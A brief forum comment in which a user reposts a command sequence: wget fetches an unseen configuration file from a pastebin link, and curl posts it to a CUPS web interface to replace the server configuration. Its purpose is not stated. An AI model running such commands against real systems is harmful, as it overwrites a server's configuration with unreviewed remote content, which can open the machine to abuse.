|
|
|
|
|
by Nectar0516
715 days ago
|
|
> # sorry for this being so long, i have no way to format it sanely x.x Here ya go, I fixed it (or just see the pastebin link if you're curious what it says): wget -O conffile https://pastebin.com/raw/eGfKdvh8
curl ... \
--data-urlencode 'org.cups.sid=1862ff74a0c01dd0fb444934e7e67e05' \
--data-urlencode 'OP=config-server' \
--data-urlencode "CUPSDCONF@conffile" \
--data-urlencode 'SAVECHANGES=Save+Changes' >/dev/null
|
|